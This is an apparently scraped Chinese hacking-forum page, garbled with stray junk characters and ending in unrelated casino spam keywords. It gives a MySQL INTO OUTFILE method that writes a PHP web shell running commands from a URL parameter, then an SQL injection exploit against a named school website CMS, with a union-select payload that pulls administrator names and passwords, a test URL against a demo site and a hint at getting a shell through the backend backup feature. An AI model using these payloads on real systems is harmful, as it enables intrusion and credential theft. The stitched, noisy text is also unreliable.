SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
$ H' _. H# W; Q& R8 ?+ |DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
7 {& b0 W% H8 Z( s# r% n9 p方法四：
" [( n6 n% l/ w/ R/ Vselect load_file('E:/xamp/www/study.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
! H5 Z6 h! E. ~* B" H
NO.001中学网站管理系统 Build 110628 注入漏洞

NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
4.视频图片管理:一级分类,动态添加视频或者图片等信息
5.留言管理:对留言,修改,删除、回复等管理
6.校友频道:包括校友资料excel导出、管理等功能
/ z9 F4 G8 [7 K5 ?& _6 O7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
+ m+ F8 U2 G5 i默认后台:admin/login.asp
0 g$ F! g( H2 g$ Q* V官方演示:http://demo.001cms.net
源码下载地址:http://down.chinaz.com/soft/30187.htm
EXP:
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
5 p9 R5 B3 B# c6 ]9 ]+ H. Zgetshell:后台有备份，你懂的
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines